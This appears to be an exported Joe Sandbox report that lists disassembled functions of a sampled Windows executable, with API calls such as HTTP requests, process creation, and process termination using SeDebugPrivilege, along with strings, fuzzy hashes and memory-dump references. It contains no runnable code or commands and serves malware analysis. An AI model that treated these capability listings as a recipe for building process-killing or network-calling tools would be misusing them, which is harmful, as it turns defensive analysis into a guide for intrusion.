Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: 3217f5b8b1a856586c0572a75fcbe3703075ede445d019fa72d004344ee46a6b
Instruction ID: 1b3c3551510723d2cbe13bec4a58d5bb72f4947573daff71fcdbbcb9a4e32932
Opcode Fuzzy Hash: 3217f5b8b1a856586c0572a75fcbe3703075ede445d019fa72d004344ee46a6b
Instruction Fuzzy Hash: C8912A74720222EFCB15EF54E895B68F3A4BF05304F5442A9E50AA7262DF34AE76CF50

Function 0023CB8D Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 185windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 0023CC15

Part of subcall function 0023CCCD: GetClientRect.USER32(?,?), ref: 0023CCF6
Part of subcall function 0023CCCD: GetWindowRect.USER32(?,?), ref: 0023CD37
Part of subcall function 0023CCCD: ScreenToClient.USER32(?,?), ref: 0023CD5F

GetDC.USER32 ref: 0029D137
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0029D14A
SelectObject.GDI32(00000000,00000000), ref: 0029D158
SelectObject.GDI32(00000000,00000000), ref: 0029D16D
ReleaseDC.USER32(?,00000000), ref: 0029D175
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0029D200

Strings

U, xrefs: 0029D0D5

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: 52ce380cc92b549edf28f48bc7ec49acb3826ae9462e99b1b5632a987c37ecd8
Instruction ID: 1d044d102462623235a83173440f70b935b8f8a18023de65296c1dcac145469b
Opcode Fuzzy Hash: 52ce380cc92b549edf28f48bc7ec49acb3826ae9462e99b1b5632a987c37ecd8
Instruction Fuzzy Hash: 3C710171420206DFCF219F64DC85AEA7BB5FF48314F24466AED596A2A6C7308C61EF60

Function 0028ECD4 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0023B34E: GetWindowLongW.USER32(?,000000EB), ref: 0023B35F

Part of subcall function 0023B63C: GetCursorPos.USER32(000000FF), ref: 0023B64F
Part of subcall function 0023B63C: ScreenToClient.USER32(00000000,000000FF), ref: 0023B66C
Part of subcall function 0023B63C: GetAsyncKeyState.USER32(00000001), ref: 0023B691
Part of subcall function 0023B63C: GetAsyncKeyState.USER32(00000002), ref: 0023B69F

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?), ref: 0028ED3C
ImageList_EndDrag.COMCTL32 ref: 0028ED42
ReleaseCapture.USER32 ref: 0028ED48
SetWindowTextW.USER32(?,00000000), ref: 0028EDF0
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0028EE03
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?), ref: 0028EEDC

Strings

@GUI_DROPID, xrefs: 0028EE33
@GUI_DRAGFILE, xrefs: 0028EE77

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID
API String ID: 1924731296-2107944366
Opcode ID: 405d77d5dab512e7d46004dec04f851c0670c632b6fff8e7bc7417ff31bc02bb
Instruction ID: 1ee3c376275c7156e53619fb4153c8fdd3d259656d437b3775318a6aa6278cdc
Opcode Fuzzy Hash: 405d77d5dab512e7d46004dec04f851c0670c632b6fff8e7bc7417ff31bc02bb
Instruction Fuzzy Hash: D851AA74224304AFD714EF20EC8AF6A77E8AB88714F40492DF5959B2E1DB709968CF52

Function 002745C4 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 133networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 002745FF
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0027462B
InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 0027466D
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00274682
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0027468F
HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 002746BF
InternetCloseHandle.WININET(00000000), ref: 00274706

Part of subcall function 00275052: GetLastError.KERNEL32(?,?,002743CC,00000000,00000000,00000001), ref: 00275067

Strings

, xrefs: 002746B8

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
String ID:
API String ID: 1241431887-3916222277
Opcode ID: c12a6678e4549b2b419fb9632afa77afdaaf08c034b36054d9be1c7a192f17e2
Instruction ID: 0bc0e80e4f9f6d7febdf79683be42179cfb23f6473d137570a91bf93d4d7aefa
Opcode Fuzzy Hash: c12a6678e4549b2b419fb9632afa77afdaaf08c034b36054d9be1c7a192f17e2
Instruction Fuzzy Hash: 3D417DB1511219BFEB05AF60DC89FBBB7ACFF0A314F008116FA099A151DBB0DD548BA4

Function 0027B644 Relevance: 13.9, APIs: 9, Instructions: 432COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,002BDC00), ref: 0027B715
FreeLibrary.KERNEL32(00000000,00000001,00000000,?,002BDC00), ref: 0027B749
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 0027B8C1
SysFreeString.OLEAUT32(?), ref: 0027B8EB

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: Free$FileLibraryModuleNamePathQueryStringType
String ID:
API String ID: 560350794-0
Opcode ID: 919e6200c04a012e3f3ea0d4ff587b1d73138f9d8492eada79324a710b62c9ff
Instruction ID: ad75987780fcf3a4e39228986abc2f1fc403a0d468df32bdf60a3c6023f07ead
Opcode Fuzzy Hash: 919e6200c04a012e3f3ea0d4ff587b1d73138f9d8492eada79324a710b62c9ff
Instruction Fuzzy Hash: C6F13971A10209EFCF05DF94C888EAEB7B9FF49311F108459F919AB250DB71AE55CB90

Function 002824D4 Relevance: 13.9, APIs: 9, Instructions: 376processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 002824F5
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00282688
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 002826AC
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 002826EC
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0028270E
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0028286F
GetLastError.KERNEL32(00000000,00000001,00000000), ref: 002828A1
CloseHandle.KERNEL32(?), ref: 002828D0
CloseHandle.KERNEL32(?), ref: 00282947

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
String ID:
API String ID: 4090791747-0
Opcode ID: 43e1f90f4b51d242fc720c5f071b04a70e26c44ac50f790b1c141b09cd2d9a22
Instruction ID: 3dcfda1e8ef8c66fa85bc9b43fab2055b61e5bfcfdf462b0ec0f56ff61c0e847
Opcode Fuzzy Hash: 43e1f90f4b51d242fc720c5f071b04a70e26c44ac50f790b1c141b09cd2d9a22
Instruction Fuzzy Hash: 02D1BE75625301DFCB14EF24D891A6EBBE4AF85310F14855DF8899B2A2DB30DC68CF52

Function 0028B33A Relevance: 13.7, APIs: 9, Instructions: 167COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0028B3F4

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 3806a8866f01df1709ac2c93c93c9eff091d741db6503e75703b0b118ca55d27
Instruction ID: c925da3abf45c56274a82b98300925606abf446e54efafd6375f47bbcbb0a6d1
Opcode Fuzzy Hash: 3806a8866f01df1709ac2c93c93c9eff091d741db6503e75703b0b118ca55d27
Instruction Fuzzy Hash: 64512738522205BFEF36BF28DC89BAD3B68AB05314F644019F615D61E2C771E874CB50

Function 0023A699 Relevance: 13.7, APIs: 9, Instructions: 163windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0029DB1B
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0029DB3C
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0029DB51
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0029DB6E
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0029DB95
DestroyIcon.USER32(00000000,?,?,?,?,?,?,0023A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 0029DBA0
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0029DBBD
DestroyIcon.USER32(00000000,?,?,?,?,?,?,0023A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 0029DBC8

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend
String ID:
API String ID: 1268354404-0
Opcode ID: 9e4732f821fa81c27251dde6064cdb241b89aacefaf18342819d089715b04515
Instruction ID: 8b8edd6982201f2dc9ba3b10a447b2cdc7490743c3aa40262512718d7f3e148f
Opcode Fuzzy Hash: 9e4732f821fa81c27251dde6064cdb241b89aacefaf18342819d089715b04515
Instruction Fuzzy Hash: 89516AB0620209EFDF24DF68DC95FAA77B8AB08754F100528F946962D0D7B0ACA0DF50

Function 00267555 Relevance: 13.6, APIs: 9, Instructions: 142filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00266EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00265FA6,?), ref: 00266ED8

Part of subcall function 00266EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00265FA6,?), ref: 00266EF1

Part of subcall function 002672CB: GetFileAttributesW.KERNEL32(?,00266019), ref: 002672CC

lstrcmpiW.KERNEL32(?,?), ref: 002675CA
_wcscmp.LIBCMT ref: 002675E2
MoveFileW.KERNEL32(?,?), ref: 002675FB

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
String ID:
API String ID: 793581249-0
Opcode ID: 596fa030866ff977fd9994dd35e4027a53c7ee5fb38894a361c1307517e5fe3d
Instruction ID: e612143040a2d4c9a63f5668da401b7d6a99fe573321d27911f78a6e20c29d77
Opcode Fuzzy Hash: 596fa030866ff977fd9994dd35e4027a53c7ee5fb38894a361c1307517e5fe3d
Instruction Fuzzy Hash: E3515FB2E192199BDF54EF94E881DDE73BC9F08314F0040AAFA05E3041EA7096D9CF60

Function 0023EA69 Relevance: 13.6, APIs: 9, Instructions: 135COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0029DAD1,00000004,00000000,00000000), ref: 0023EAEB
ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,0029DAD1,00000004,00000000,00000000), ref: 0023EB32
ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,0029DAD1,00000004,00000000,00000000), ref: 0029DC86
ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0029DAD1,00000004,00000000,00000000), ref: 0029DCF2

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 39bfe9eae7344114ae6a17bfa8790f35cd3bf8898e691551fdf6e97cae80924f
Instruction ID: 328cb0a60c3185a357acdfae740bd6bd93e24bfbaebb76c6b162010906f8419a
Opcode Fuzzy Hash: 39bfe9eae7344114ae6a17bfa8790f35cd3bf8898e691551fdf6e97cae80924f
Instruction Fuzzy Hash: 2141DBF02352819BDF3A5F289D8DB66BA97BF52308F57041AE047469E1C7B0BC68D711

Function 0025B263 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0025AEF1,00000B00,?,?), ref: 0025B26C
HeapAlloc.KERNEL32(00000000,?,0025AEF1,00000B00,?,?), ref: 0025B273
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0025AEF1,00000B00,?,?), ref: 0025B288
GetCurrentProcess.KERNEL32(?,00000000,?,0025AEF1,00000B00,?,?), ref: 0025B290
DuplicateHandle.KERNEL32(00000000,?,0025AEF1,00000B00,?,?), ref: 0025B293
GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0025AEF1,00000B00,?,?), ref: 0025B2A3
GetCurrentProcess.KERNEL32(0025AEF1,00000000,?,0025AEF1,00000B00,?,?), ref: 0025B2AB
DuplicateHandle.KERNEL32(00000000,?,0025AEF1,00000B00,?,?), ref: 0025B2AE
CreateThread.KERNEL32(00000000,00000000,0025B2D4,00000000,00000000,00000000), ref: 0025B2C8

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: 4077d711e175d3168d896b7a516f47686805d1bfb6f5da86c3e99dd18428fb91
Instruction ID: 21e012e093a8ea396a1069ccebb9fbc0d123997a4dc3aff699cb25c488efb9e7
Opcode Fuzzy Hash: 4077d711e175d3168d896b7a516f47686805d1bfb6f5da86c3e99dd18428fb91
Instruction Fuzzy Hash: C001BBB5240304BFEB10ABA5EC4DF6B7BACEB89711F018451FA06DB5A1CA749800CF61

Function 0027C43F Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 401COMMON

Download Yara Rule

Strings

NULL Pointer assignment, xrefs: 0027C876, 0027C887
Not an Object type, xrefs: 0027C49E

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: 645a9470f94d0ed85e966d69ebbf40b86c00f9e9054e6e7153bdbf461117a22f
Instruction ID: 10a981d763794616a437c44f8fc79cd22168eed9d6c78b14ae44f7cc9eccd9ad
Opcode Fuzzy Hash: 645a9470f94d0ed85e966d69ebbf40b86c00f9e9054e6e7153bdbf461117a22f
Instruction Fuzzy Hash: 32E1C871A2021AAFDF14DFB4D885AAEB7B9EF48314F24802DF909A7280D7709D65CF50

Function 002716DA Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 309COMMON

Download Yara Rule

APIs

Part of subcall function 0022936C: __swprintf.LIBCMT ref: 002293AB
Part of subcall function 0022936C: __itow.LIBCMT ref: 002293DF

Part of subcall function 0023C6F4: _wcscpy.LIBCMT ref: 0023C717

_wcstok.LIBCMT ref: 0027184E
_wcscpy.LIBCMT ref: 002718DD
_memset.LIBCMT ref: 00271910

Strings

p2-l2-, xrefs: 00271920
X, xrefs: 00271948

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: _wcscpy$__itow__swprintf_memset_wcstok
String ID: X$p2-l2-
API String ID: 774024439-3018490129
Opcode ID: bc5fb75746d450f00829a31b201dea804b316c4e31d882066cf6a2e2654bdf1d
Instruction ID: b4b6f65e99854df5726cbc74c4f8d65d0db4fa46102447ba4b38286019f82f7d
Opcode Fuzzy Hash: bc5fb75746d450f00829a31b201dea804b316c4e31d882066cf6a2e2654bdf1d
Instruction Fuzzy Hash: E3C18E31524351AFC714EF68D885A5AB7E4BF85350F00892DF989972A2DB30ED65CF82

Function 00289A75 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 142windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00289B19
SendMessageW.USER32(?,00001036,00000000,?), ref: 00289B2D
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00289B47
_wcscat.LIBCMT ref: 00289BA2
SendMessageW.USER32(?,00001057,00000000,?), ref: 00289BB9
SendMessageW.USER32(?,00001061,?,0000000F), ref: 00289BE7

Strings

SysListView32, xrefs: 00289AEB

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: MessageSend$Window_wcscat
String ID: SysListView32
API String ID: 307300125-78025650
Opcode ID: f1e824a56e1563abbc8dfa1c43d226abb3b847d2ea573b93c1cc35f337984e5b
Instruction ID: 11ae18b1240093eb56f10706a8f73a61d62a2c1d4954e0f590616a2fc754eb58
Opcode Fuzzy Hash: f1e824a56e1563abbc8dfa1c43d226abb3b847d2ea573b93c1cc35f337984e5b
Instruction Fuzzy Hash: F241C174920309EBDB21EFA4DC89BEE77A8EF08354F14442AF589A72D1C6719D94CB60

Function 0028172F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135COMMON

Download Yara Rule

APIs

Part of subcall function 00266532: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00266554
Part of subcall function 00266532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00266564
Part of subcall function 00266532: CloseHandle.KERNEL32(00000000,?,00000000), ref: 002665F9

OpenProcess.KERNEL32(00000001,00000000,?), ref: 0028179A
GetLastError.KERNEL32 ref: 002817AD
OpenProcess.KERNEL32(00000001,00000000,?), ref: 002817D9
TerminateProcess.KERNEL32(00000000,00000000), ref: 00281855
GetLastError.KERNEL32(00000000), ref: 00281860
CloseHandle.KERNEL32(00000000), ref: 00281895

Strings

SeDebugPrivilege, xrefs: 002817B8

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: 06ba3af49ca4ec9ba34207ed313539bda26654e754ec0aa7e2351d592c0ba5d5
Instruction ID: af014a9f5d436cd197e1152c399d8332a065b5ec5ce0f6da50a5d161d4f626af
Opcode Fuzzy Hash: 06ba3af49ca4ec9ba34207ed313539bda26654e754ec0aa7e2351d592c0ba5d5
Instruction Fuzzy Hash: 9741EF75620201AFDF05FF94D896F6DB7A5AF04700F048099F9069F2C2DBB4A965CF91

Function 00265819 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 002658B8

Strings

info, xrefs: 00265859
question, xrefs: 00265871
stop, xrefs: 00265889
blank, xrefs: 0026583A
warning, xrefs: 002658A1

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
